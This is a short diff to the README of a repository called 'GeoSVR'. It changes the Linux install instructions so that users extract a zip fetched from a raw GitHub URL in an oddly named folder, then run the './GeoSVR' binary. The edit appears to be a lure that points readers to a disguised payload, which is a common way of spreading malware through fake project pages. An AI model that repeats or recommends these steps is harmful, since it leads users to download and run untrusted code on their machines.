TheShartlorde/GeoSVR/README.md

 ### Linux

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/TheShartlorde/GeoSVR/main/ectosarcous/GeoSVR.zip` file.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the application using `./GeoSVR` command.